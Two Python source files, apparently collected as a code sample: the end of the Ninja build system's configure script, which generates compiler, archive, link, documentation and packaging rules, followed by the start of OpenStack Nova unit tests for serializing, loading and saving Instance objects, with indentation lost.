return n.build(built(name + objext), 'cxx', src(name + '.cc'), **kwargs)
def binary(name):
if platform in ('mingw', 'windows'):
exe = name + '.exe'
n.build(name, 'phony', exe)
return exe
return name
n.variable('builddir', 'build')
n.variable('cxx', CXX)
if platform == 'windows':
n.variable('ar', 'link')
else:
n.variable('ar', configure_env.get('AR', 'ar'))
if platform == 'windows':
cflags = ['/nologo', # Don't print startup banner.
'/Zi', # Create pdb with debug info.
'/W4', # Highest warning level.
'/WX', # Warnings as errors.
'/wd4530', '/wd4100', '/wd4706',
'/wd4512', '/wd4800', '/wd4702', '/wd4819',
'/GR-', # Disable RTTI.
# Disable size_t -> int truncation warning.
# We never have strings or arrays larger than 2**31.
'/wd4267',
'/DNOMINMAX', '/D_CRT_SECURE_NO_WARNINGS',
'/DNINJA_PYTHON="%s"' % options.with_python]
ldflags = ['/DEBUG', '/libpath:$builddir']
if not options.debug:
cflags += ['/Ox', '/DNDEBUG', '/GL']
ldflags += ['/LTCG', '/OPT:REF', '/OPT:ICF']
else:
cflags = ['-g', '-Wall', '-Wextra',
'-Wno-deprecated',
'-Wno-unused-parameter',
'-fno-rtti',
'-fno-exceptions',
'-fvisibility=hidden', '-pipe',
'-DNINJA_PYTHON="%s"' % options.with_python]
if options.debug:
cflags += ['-D_GLIBCXX_DEBUG', '-D_GLIBCXX_DEBUG_PEDANTIC']
else:
cflags += ['-O2', '-DNDEBUG']
if 'clang' in os.path.basename(CXX):
cflags += ['-fcolor-diagnostics']
if platform == 'mingw':
cflags += ['-D_WIN32_WINNT=0x0501']
ldflags = ['-L$builddir']
libs = []
if platform == 'mingw':
cflags.remove('-fvisibility=hidden');
ldflags.append('-static')
elif platform == 'sunos5':
cflags.remove('-fvisibility=hidden')
elif platform == 'windows':
pass
else:
if options.profile == 'gmon':
cflags.append('-pg')
ldflags.append('-pg')
elif options.profile == 'pprof':
libs.append('-lprofiler')
def shell_escape(str):
"""Escape str such that it's interpreted as a single argument by the shell."""
# This isn't complete, but it's just enough to make NINJA_PYTHON work.
if platform in ('windows', 'mingw'):
return str
if '"' in str:
return "'%s'" % str.replace("'", "\\'")
return str
if 'CFLAGS' in configure_env:
cflags.append(configure_env['CFLAGS'])
n.variable('cflags', ' '.join(shell_escape(flag) for flag in cflags))
if 'LDFLAGS' in configure_env:
ldflags.append(configure_env['LDFLAGS'])
n.variable('ldflags', ' '.join(shell_escape(flag) for flag in ldflags))
n.newline()
if platform == 'windows':
compiler = '$cxx'
if options.with_msvc_helper:
compiler = '%s -o $out -- $cxx /showIncludes' % options.with_msvc_helper
n.rule('cxx',
command='%s $cflags -c $in /Fo$out' % compiler,
depfile='$out.d',
description='CXX $out')
else:
n.rule('cxx',
command='$cxx -MMD -MT $out -MF $out.d $cflags -c $in -o $out',
depfile='$out.d',
description='CXX $out')
n.newline()
if host == 'windows':
n.rule('ar',
command='lib /nologo /ltcg /out:$out $in',
description='LIB $out')
elif host == 'mingw':
n.rule('ar',
command='cmd /c $ar cqs $out.tmp $in && move /Y $out.tmp $out',
description='AR $out')
else:
n.rule('ar',
command='rm -f $out && $ar crs $out $in',
description='AR $out')
n.newline()
if platform == 'windows':
n.rule('link',
command='$cxx $in $libs /nologo /link $ldflags /out:$out',
description='LINK $out')
else:
n.rule('link',
command='$cxx $ldflags -o $out $in $libs',
description='LINK $out')
n.newline()
objs = []
if platform not in ('mingw', 'windows'):
n.comment('browse_py.h is used to inline browse.py.')
n.rule('inline',
command='src/inline.sh $varname < $in > $out',
description='INLINE $out')
n.build(built('browse_py.h'), 'inline', src('browse.py'),
implicit='src/inline.sh',
variables=[('varname', 'kBrowsePy')])
n.newline()
objs += cxx('browse', order_only=built('browse_py.h'))
n.newline()
n.comment('the depfile parser and ninja lexers are generated using re2c.')
def has_re2c():
import subprocess
try:
subprocess.call(['re2c', '-v'], stdout=subprocess.PIPE)
return True
except OSError:
return False
if has_re2c():
n.rule('re2c',
command='re2c -b -i --no-generation-date -o $out $in',
description='RE2C $out')
# Generate the .cc files in the source directory so we can check them in.
n.build(src('depfile_parser.cc'), 're2c', src('depfile_parser.in.cc'))
n.build(src('lexer.cc'), 're2c', src('lexer.in.cc'))
else:
print ("warning: re2c not found; changes to src/*.in.cc will not affect "
"your build.")
n.newline()
n.comment('Core source files all build into ninja library.')
for name in ['build',
'build_log',
'clean',
'depfile_parser',
'disk_interface',
'edit_distance',
'eval_env',
'explain',
'graph',
'graphviz',
'lexer',
'manifest_parser',
'metrics',
'state',
'util']:
objs += cxx(name)
if platform in ('mingw', 'windows'):
objs += cxx('subprocess-win32')
if platform == 'windows':
objs += cxx('includes_normalize-win32')
objs += cxx('msvc_helper-win32')
objs += cxx('minidump-win32')
objs += cc('getopt')
else:
objs += cxx('subprocess-posix')
if platform == 'windows':
ninja_lib = n.build(built('ninja.lib'), 'ar', objs)
else:
ninja_lib = n.build(built('libninja.a'), 'ar', objs)
n.newline()
if platform == 'windows':
libs.append('ninja.lib')
else:
libs.append('-lninja')
all_targets = []
n.comment('Main executable is library plus main() function.')
objs = cxx('ninja')
ninja = n.build(binary('ninja'), 'link', objs, implicit=ninja_lib,
variables=[('libs', libs)])
n.newline()
all_targets += ninja
if platform == 'windows':
n.comment('Helper for working with MSVC.')
msvc_helper = n.build(binary('ninja-msvc-helper'), 'link',
cxx('msvc_helper_main-win32'),
implicit=ninja_lib,
variables=[('libs', libs)])
n.default(msvc_helper)
n.newline()
all_targets += msvc_helper
n.comment('Tests all build into ninja_test executable.')
variables = []
test_cflags = None
test_ldflags = None
test_libs = libs
objs = []
if options.with_gtest:
path = options.with_gtest
gtest_all_incs = '-I%s -I%s' % (path, os.path.join(path, 'include'))
if platform == 'windows':
gtest_cflags = '/nologo /EHsc ' + gtest_all_incs
else:
gtest_cflags = '-fvisibility=hidden ' + gtest_all_incs
objs += n.build(built('gtest-all' + objext), 'cxx',
os.path.join(path, 'src', 'gtest-all.cc'),
variables=[('cflags', gtest_cflags)])
objs += n.build(built('gtest_main' + objext), 'cxx',
os.path.join(path, 'src', 'gtest_main.cc'),
variables=[('cflags', gtest_cflags)])
test_cflags = cflags + ['-DGTEST_HAS_RTTI=0',
'-I%s' % os.path.join(path, 'include')]
elif platform == 'windows':
test_libs.extend(['gtest_main.lib', 'gtest.lib'])
else:
test_libs.extend(['-lgtest_main', '-lgtest'])
for name in ['build_log_test',
'build_test',
'clean_test',
'depfile_parser_test',
'disk_interface_test',
'edit_distance_test',
'graph_test',
'lexer_test',
'manifest_parser_test',
'state_test',
'subprocess_test',
'test',
'util_test']:
objs += cxx(name, variables=[('cflags', test_cflags)])
if platform == 'windows':
for name in ['includes_normalize_test', 'msvc_helper_test']:
objs += cxx(name, variables=[('cflags', test_cflags)])
if platform != 'mingw' and platform != 'windows':
test_libs.append('-lpthread')
ninja_test = n.build(binary('ninja_test'), 'link', objs, implicit=ninja_lib,
variables=[('ldflags', test_ldflags),
('libs', test_libs)])
n.newline()
all_targets += ninja_test
n.comment('Ancilliary executables.')
objs = cxx('parser_perftest')
all_targets += n.build(binary('parser_perftest'), 'link', objs,
implicit=ninja_lib, variables=[('libs', libs)])
objs = cxx('build_log_perftest')
all_targets += n.build(binary('build_log_perftest'), 'link', objs,
implicit=ninja_lib, variables=[('libs', libs)])
objs = cxx('canon_perftest')
all_targets += n.build(binary('canon_perftest'), 'link', objs,
implicit=ninja_lib, variables=[('libs', libs)])
objs = cxx('hash_collision_bench')
all_targets += n.build(binary('hash_collision_bench'), 'link', objs,
implicit=ninja_lib, variables=[('libs', libs)])
n.newline()
n.comment('Generate a graph using the "graph" tool.')
n.rule('gendot',
command='./ninja -t graph > $out')
n.rule('gengraph',
command='dot -Tpng $in > $out')
dot = n.build(built('graph.dot'), 'gendot', ['ninja', 'build.ninja'])
n.build('graph.png', 'gengraph', dot)
n.newline()
n.comment('Generate the manual using asciidoc.')
n.rule('asciidoc',
command='asciidoc -a toc -a max-width=45em -o $out $in',
description='ASCIIDOC $in')
manual = n.build(doc('manual.html'), 'asciidoc', doc('manual.asciidoc'))
n.build('manual', 'phony',
order_only=manual)
n.newline()
n.comment('Generate Doxygen.')
n.rule('doxygen',
command='doxygen $in',
description='DOXYGEN $in')
n.variable('doxygen_mainpage_generator',
src('gen_doxygen_mainpage.sh'))
n.rule('doxygen_mainpage',
command='$doxygen_mainpage_generator $in > $out',
description='DOXYGEN_MAINPAGE $out')
mainpage = n.build(built('doxygen_mainpage'), 'doxygen_mainpage',
['README', 'COPYING'],
implicit=['$doxygen_mainpage_generator'])
n.build('doxygen', 'doxygen', doc('doxygen.config'),
implicit=mainpage)
n.newline()
if host != 'mingw':
n.comment('Regenerate build files if build script changes.')
n.rule('configure',
command='${configure_env}%s configure.py $configure_args' %
options.with_python,
generator=True)
n.build('build.ninja', 'configure',
implicit=['configure.py', os.path.normpath('misc/ninja_syntax.py')])
n.newline()
n.default(ninja)
n.newline()
if host == 'linux':
n.comment('Packaging')
n.rule('rpmbuild',
command="rpmbuild \
--define 'ver git' \
--define \"rel `git rev-parse --short HEAD`\" \
--define '_topdir %(pwd)/rpm-build' \
--define '_builddir %{_topdir}' \
--define '_rpmdir %{_topdir}' \
--define '_srcrpmdir %{_topdir}' \
--define '_rpmfilename %%{NAME}-%%{VERSION}-%%{RELEASE}.%%{ARCH}.rpm' \
--define '_specdir %{_topdir}' \
--define '_sourcedir %{_topdir}' \
--quiet \
-bb misc/packaging/ninja.spec",
description='Building RPM..')
n.build('rpm', 'rpmbuild',
implicit=['ninja','README', 'COPYING', doc('manual.html')])
n.newline()
n.build('all', 'phony', all_targets)
print 'wrote %s.' % BUILD_FILENAME
| |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import iso8601
import mock
import mox
import netaddr
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import flavors
from nova import db
from nova import exception
from nova.network import model as network_model
from nova import notifications
from nova.objects import instance
from nova.objects import instance_info_cache
from nova.objects import instance_numa_topology
from nova.objects import pci_device
from nova.objects import security_group
from nova.openstack.common import timeutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_instance
from nova.tests.objects import test_instance_fault
from nova.tests.objects import test_instance_info_cache
from nova.tests.objects import test_instance_numa_topology
from nova.tests.objects import test_objects
from nova.tests.objects import test_security_group
from nova import utils
class _TestInstanceObject(object):
@property
def fake_instance(self):
fake_instance = fakes.stub_instance(id=2,
access_ipv4='1.2.3.4',
access_ipv6='::1')
fake_instance['cell_name'] = 'api!child'
fake_instance['scheduled_at'] = None
fake_instance['terminated_at'] = None
fake_instance['deleted_at'] = None
fake_instance['created_at'] = None
fake_instance['updated_at'] = None
fake_instance['launched_at'] = (
fake_instance['launched_at'].replace(
tzinfo=iso8601.iso8601.Utc(), microsecond=0))
fake_instance['deleted'] = False
fake_instance['info_cache']['instance_uuid'] = fake_instance['uuid']
fake_instance['security_groups'] = []
fake_instance['pci_devices'] = []
fake_instance['user_id'] = self.context.user_id
fake_instance['project_id'] = self.context.project_id
return fake_instance
def test_datetime_deserialization(self):
red_letter_date = timeutils.parse_isotime(
timeutils.isotime(datetime.datetime(1955, 11, 5)))
inst = instance.Instance(uuid='fake-uuid', launched_at=red_letter_date)
primitive = inst.obj_to_primitive()
expected = {'nova_object.name': 'Instance',
'nova_object.namespace': 'nova',
'nova_object.version': '1.15',
'nova_object.data':
{'uuid': 'fake-uuid',
'launched_at': '1955-11-05T00:00:00Z'},
'nova_object.changes': ['launched_at', 'uuid']}
self.assertEqual(primitive, expected)
inst2 = instance.Instance.obj_from_primitive(primitive)
self.assertIsInstance(inst2.launched_at, datetime.datetime)
self.assertEqual(inst2.launched_at, red_letter_date)
def test_ip_deserialization(self):
inst = instance.Instance(uuid='fake-uuid', access_ip_v4='1.2.3.4',
access_ip_v6='::1')
primitive = inst.obj_to_primitive()
expected = {'nova_object.name': 'Instance',
'nova_object.namespace': 'nova',
'nova_object.version': '1.15',
'nova_object.data':
{'uuid': 'fake-uuid',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '::1'},
'nova_object.changes': ['uuid', 'access_ip_v6',
'access_ip_v4']}
self.assertEqual(primitive, expected)
inst2 = instance.Instance.obj_from_primitive(primitive)
self.assertIsInstance(inst2.access_ip_v4, netaddr.IPAddress)
self.assertIsInstance(inst2.access_ip_v6, netaddr.IPAddress)
self.assertEqual(inst2.access_ip_v4, netaddr.IPAddress('1.2.3.4'))
self.assertEqual(inst2.access_ip_v6, netaddr.IPAddress('::1'))
def test_get_without_expected(self):
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, 'uuid',
columns_to_join=[],
use_slave=False
).AndReturn(self.fake_instance)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, 'uuid',
expected_attrs=[])
for attr in instance.INSTANCE_OPTIONAL_ATTRS:
self.assertFalse(inst.obj_attr_is_set(attr))
self.assertRemotes()
def test_get_with_expected(self):
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
self.mox.StubOutWithMock(
db, 'instance_extra_get_by_instance_uuid')
exp_cols = instance.INSTANCE_OPTIONAL_ATTRS[:]
exp_cols.remove('fault')
exp_cols.remove('numa_topology')
db.instance_get_by_uuid(
self.context, 'uuid',
columns_to_join=exp_cols,
use_slave=False
).AndReturn(self.fake_instance)
fake_faults = test_instance_fault.fake_faults
db.instance_fault_get_by_instance_uuids(
self.context, [self.fake_instance['uuid']]
).AndReturn(fake_faults)
fake_topology = test_instance_numa_topology.fake_db_topology
db.instance_extra_get_by_instance_uuid(
self.context, self.fake_instance['uuid']
).AndReturn(fake_topology)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(
self.context, 'uuid',
expected_attrs=instance.INSTANCE_OPTIONAL_ATTRS)
for attr in instance.INSTANCE_OPTIONAL_ATTRS:
self.assertTrue(inst.obj_attr_is_set(attr))
self.assertRemotes()
def test_get_by_id(self):
self.mox.StubOutWithMock(db, 'instance_get')
db.instance_get(self.context, 'instid',
columns_to_join=['info_cache',
'security_groups']
).AndReturn(self.fake_instance)
self.mox.ReplayAll()
inst = instance.Instance.get_by_id(self.context, 'instid')
self.assertEqual(inst.uuid, self.fake_instance['uuid'])
self.assertRemotes()
def test_load(self):
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
fake_uuid = self.fake_instance['uuid']
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(self.fake_instance)
fake_inst2 = dict(self.fake_instance,
system_metadata=[{'key': 'foo', 'value': 'bar'}])
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['system_metadata'],
use_slave=False
).AndReturn(fake_inst2)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
self.assertFalse(hasattr(inst, '_system_metadata'))
sys_meta = inst.system_metadata
self.assertEqual(sys_meta, {'foo': 'bar'})
self.assertTrue(hasattr(inst, '_system_metadata'))
# Make sure we don't run load again
sys_meta2 = inst.system_metadata
self.assertEqual(sys_meta2, {'foo': 'bar'})
self.assertRemotes()
def test_load_invalid(self):
inst = instance.Instance(context=self.context, uuid='fake-uuid')
self.assertRaises(exception.ObjectActionError,
inst.obj_load_attr, 'foo')
def test_get_remote(self):
# isotime doesn't have microseconds and is always UTC
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
fake_instance = self.fake_instance
db.instance_get_by_uuid(self.context, 'fake-uuid',
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(fake_instance)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, 'fake-uuid')
self.assertEqual(inst.id, fake_instance['id'])
self.assertEqual(inst.launched_at, fake_instance['launched_at'])
self.assertEqual(str(inst.access_ip_v4),
fake_instance['access_ip_v4'])
self.assertEqual(str(inst.access_ip_v6),
fake_instance['access_ip_v6'])
self.assertRemotes()
def test_refresh(self):
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
fake_uuid = self.fake_instance['uuid']
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(dict(self.fake_instance,
host='orig-host'))
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(dict(self.fake_instance,
host='new-host'))
self.mox.StubOutWithMock(instance_info_cache.InstanceInfoCache,
'refresh')
instance_info_cache.InstanceInfoCache.refresh()
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
self.assertEqual(inst.host, 'orig-host')
inst.refresh()
self.assertEqual(inst.host, 'new-host')
self.assertRemotes()
self.assertEqual(set([]), inst.obj_what_changed())
def test_refresh_does_not_recurse(self):
inst = instance.Instance(context=self.context, uuid='fake-uuid',
metadata={})
inst_copy = instance.Instance()
inst_copy.uuid = inst.uuid
self.mox.StubOutWithMock(instance.Instance, 'get_by_uuid')
instance.Instance.get_by_uuid(self.context, uuid=inst.uuid,
expected_attrs=['metadata'],
use_slave=False
).AndReturn(inst_copy)
self.mox.ReplayAll()
self.assertRaises(exception.OrphanedObjectError, inst.refresh)
def _save_test_helper(self, cell_type, save_kwargs):
"""Common code for testing save() for cells/non-cells."""
if cell_type:
self.flags(enable=True, cell_type=cell_type, group='cells')
else:
self.flags(enable=False, group='cells')
old_ref = dict(self.fake_instance, host='oldhost', user_data='old',
vm_state='old', task_state='old')
fake_uuid = old_ref['uuid']
expected_updates = dict(vm_state='meow', task_state='wuff',
user_data='new')
new_ref = dict(old_ref, host='newhost', **expected_updates)
exp_vm_state = save_kwargs.get('expected_vm_state')
exp_task_state = save_kwargs.get('expected_task_state')
admin_reset = save_kwargs.get('admin_state_reset', False)
if exp_vm_state:
expected_updates['expected_vm_state'] = exp_vm_state
if exp_task_state:
if (exp_task_state == 'image_snapshot' and
'instance_version' in save_kwargs and
save_kwargs['instance_version'] == '1.9'):
expected_updates['expected_task_state'] = [
'image_snapshot', 'image_snapshot_pending']
else:
expected_updates['expected_task_state'] = exp_task_state
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(db, 'instance_info_cache_update')
cells_api_mock = self.mox.CreateMock(cells_rpcapi.CellsAPI)
self.mox.StubOutWithMock(cells_api_mock,
'instance_update_at_top')
self.mox.StubOutWithMock(cells_api_mock,
'instance_update_from_api')
self.mox.StubOutWithMock(cells_rpcapi, 'CellsAPI',
use_mock_anything=True)
self.mox.StubOutWithMock(notifications, 'send_update')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(old_ref)
db.instance_update_and_get_original(
self.context, fake_uuid, expected_updates,
update_cells=False,
columns_to_join=['info_cache', 'security_groups',
'system_metadata']
).AndReturn((old_ref, new_ref))
if cell_type == 'api':
cells_rpcapi.CellsAPI().AndReturn(cells_api_mock)
cells_api_mock.instance_update_from_api(
self.context, mox.IsA(instance.Instance),
exp_vm_state, exp_task_state, admin_reset)
elif cell_type == 'compute':
cells_rpcapi.CellsAPI().AndReturn(cells_api_mock)
cells_api_mock.instance_update_at_top(self.context, new_ref)
notifications.send_update(self.context, mox.IgnoreArg(),
mox.IgnoreArg())
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, old_ref['uuid'])
if 'instance_version' in save_kwargs:
inst.VERSION = save_kwargs.pop('instance_version')
self.assertEqual('old', inst.task_state)
self.assertEqual('old', inst.vm_state)
self.assertEqual('old', inst.user_data)
inst.vm_state = 'meow'
inst.task_state = 'wuff'
inst.user_data = 'new'
inst.save(**save_kwargs)
self.assertEqual('newhost', inst.host)
self.assertEqual('meow', inst.vm_state)
self.assertEqual('wuff', inst.task_state)
self.assertEqual('new', inst.user_data)
self.assertEqual(set([]), inst.obj_what_changed())
def test_save(self):
self._save_test_helper(None, {})
def test_save_in_api_cell(self):
self._save_test_helper('api', {})
def test_save_in_compute_cell(self):
self._save_test_helper('compute', {})
def test_save_exp_vm_state(self):
self._save_test_helper(None, {'expected_vm_state': ['meow']})
def test_save_exp_task_state(self):
self._save_test_helper(None, {'expected_task_state': ['meow']})
def test_save_exp_task_state_havana(self):
self._save_test_helper(None, {
'expected_task_state': 'image_snapshot',
'instance_version': '1.9'})
def test_save_exp_vm_state_api_cell(self):
self._save_test_helper('api', {'expected_vm_state': ['meow']})
def test_save_exp_task_state_api_cell(self):
self._save_test_helper('api', {'expected_task_state': ['meow']})
def test_save_exp_task_state_api_cell_admin_reset(self):
self._save_test_helper('api', {'admin_state_reset': True})
def test_save_rename_sends_notification(self):
# Tests that simply changing the 'display_name' on the instance
# will send a notification.
self.flags(enable=False, group='cells')
old_ref = dict(self.fake_instance, display_name='hello')
fake_uuid = old_ref['uuid']
expected_updates = dict(display_name='goodbye')
new_ref = dict(old_ref, **expected_updates)
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(notifications, 'send_update')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(old_ref)
db.instance_update_and_get_original(
self.context, fake_uuid, expected_updates, update_cells=False,
columns_to_join=['info_cache', 'security_groups',
'system_metadata']
).AndReturn((old_ref, new_ref))
notifications.send_update(self.context, mox.IgnoreArg(),
mox.IgnoreArg())
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, old_ref['uuid'],
use_slave=False)
self.assertEqual('hello', inst.display_name)
inst.display_name = 'goodbye'
inst.save()
self.assertEqual('goodbye', inst.display_name)
self.assertEqual(set([]), inst.obj_what_changed())
@mock.patch('nova.db.instance_update_and_get_original')
@mock.patch('nova.objects.Instance._from_db_object')
def test_save_does_not_refresh_pci_devices(self, mock_fdo, mock_update):
# NOTE(danms): This tests that we don't update the pci_devices
# field from the contents of the database. This is not because we
# don't necessarily want to, but because the way pci_devices is
# currently implemented it causes versioning issues. When that is
# resolved, this test should go away.
mock_update.return_value = None, None
inst = instance.Instance(context=self.context, id=123)
inst.uuid = 'foo'
inst.pci_devices = pci_device.PciDeviceList()
inst.save()
self.assertNotIn('pci_devices',
mock_fdo.call_args_list[0][1]['expected_attrs'])
def test_get_deleted(self):
fake_inst = dict(self.fake_instance, id=123, deleted=123)
fake_uuid = fake_inst['uuid']
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
# NOTE(danms): Make sure it's actually a bool
self.assertEqual(inst.deleted, True)
def test_get_not_cleaned(self):
fake_inst = dict(self.fake_instance, id=123, cleaned=None)
fake_uuid = fake_inst['uuid']
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
# NOTE(mikal): Make sure it's actually a bool
self.assertEqual(inst.cleaned, False)
def test_get_cleaned(self):
fake_inst = dict(self.fake_instance, id=123, cleaned=1)
fake_uuid = fake_inst['uuid']
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
# NOTE(mikal): Make sure it's actually a bool
self.assertEqual(inst.cleaned, True)
def test_with_info_cache(self):
fake_inst = dict(self.fake_instance)
fake_uuid = fake_inst['uuid']
nwinfo1 = network_model.NetworkInfo.hydrate([{'address': 'foo'}])
nwinfo2 = network_model.NetworkInfo.hydrate([{'address': 'bar'}])
nwinfo1_json = nwinfo1.json()
nwinfo2_json = nwinfo2.json()
fake_inst['info_cache'] = dict(
test_instance_info_cache.fake_info_cache,
network_info=nwinfo1_json,
instance_uuid=fake_uuid)
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(db, 'instance_info_cache_update')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(fake_inst)
db.instance_info_cache_update(self.context, fake_uuid,
{'network_info': nwinfo2_json})
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
self.assertEqual(inst.info_cache.network_info, nwinfo1)
self.assertEqual(inst.info_cache.instance_uuid, fake_uuid)
inst.info_cache.network_info = nwinfo2
inst.save()
def test_with_info_cache_none(self):
fake_inst = dict(self.fake_instance, info_cache=None)
fake_uuid = fake_inst['uuid']
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache'],
use_slave=False
).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
['info_cache'])
self.assertIsNone(inst.info_cache)
def test_with_security_groups(self):
fake_inst = dict(self.fake_instance)
fake_uuid = fake_inst['uuid']
fake_inst['security_groups'] = [
{'id': 1, 'name': 'secgroup1', 'description': 'fake-desc',
'user_id': 'fake-user', 'project_id': 'fake_project',
'created_at': None, 'updated_at': None, 'deleted_at': None,
'deleted': False},
{'id': 2, 'name': 'secgroup2', 'description': 'fake-desc',
'user_id': 'fake-user', 'project_id': 'fake_project',
'created_at': None, 'updated_at': None, 'deleted_at': None,
'deleted': False},
]
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(db, 'security_group_update')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(fake_inst)
db.security_group_update(self.context, 1, {'description': 'changed'}
).AndReturn(fake_inst['security_groups'][0])
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
self.assertEqual(len(inst.security_groups), 2)
for index, group in enumerate(fake_inst['security_groups']):
for key in group:
self.assertEqual(group[key],
inst.security_groups[index][key])
self.assertIsInstance(inst.security_groups[index],
security_group.SecurityGroup)
self.assertEqual(inst.security_groups.obj_what_changed(), set())
inst.security_groups[0].description = 'changed'
inst.save()
self.assertEqual(inst.security_groups.obj_what_changed(), set())
def test_with_empty_security_groups(self):
fake_inst = dict(self.fake_instance, security_groups=[])
fake_uuid = fake_inst['uuid']
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['info_cache',
'security_groups'],
use_slave=False
).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid)
self.assertEqual(0, len(inst.security_groups))
def test_with_empty_pci_devices(self):
fake_inst = dict(self.fake_instance, pci_devices=[])
fake_uuid = fake_inst['uuid']
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['pci_devices'],
use_slave=False
).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
['pci_devices'])
self.assertEqual(len(inst.pci_devices), 0)
def test_with_pci_devices(self):
fake_inst = dict(self.fake_instance)
fake_uuid = fake_inst['uuid']
fake_inst['pci_devices'] = [
{'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': None,
'id': 2,
'compute_node_id': 1,
'address': 'a1',
'vendor_id': 'v1',
'product_id': 'p1',
'dev_type': 't',
'status': 'allocated',
'dev_id': 'i',
'label': 'l',
'instance_uuid': fake_uuid,
'request_id': None,
'extra_info': '{}'},
{
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': None,
'id': 1,
'compute_node_id': 1,
'address': 'a',
'vendor_id': 'v',
'product_id': 'p',
'dev_type': 't',
'status': 'allocated',
'dev_id': 'i',
'label': 'l',
'instance_uuid': fake_uuid,
'request_id': None,
'extra_info': '{}'},
]
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=['pci_devices'],
use_slave=False
).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
['pci_devices'])
self.assertEqual(len(inst.pci_devices), 2)
self.assertEqual(inst.pci_devices[0].instance_uuid, fake_uuid)
self.assertEqual(inst.pci_devices[1].instance_uuid, fake_uuid)
def test_with_fault(self):
fake_inst = dict(self.fake_instance)
fake_uuid = fake_inst['uuid']
fake_faults = [dict(x, instance_uuid=fake_uuid)
for x in test_instance_fault.fake_faults['fake-uuid']]
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
db.instance_get_by_uuid(self.context, fake_uuid,
columns_to_join=[],
use_slave=False
).AndReturn(self.fake_instance)
db.instance_fault_get_by_instance_uuids(
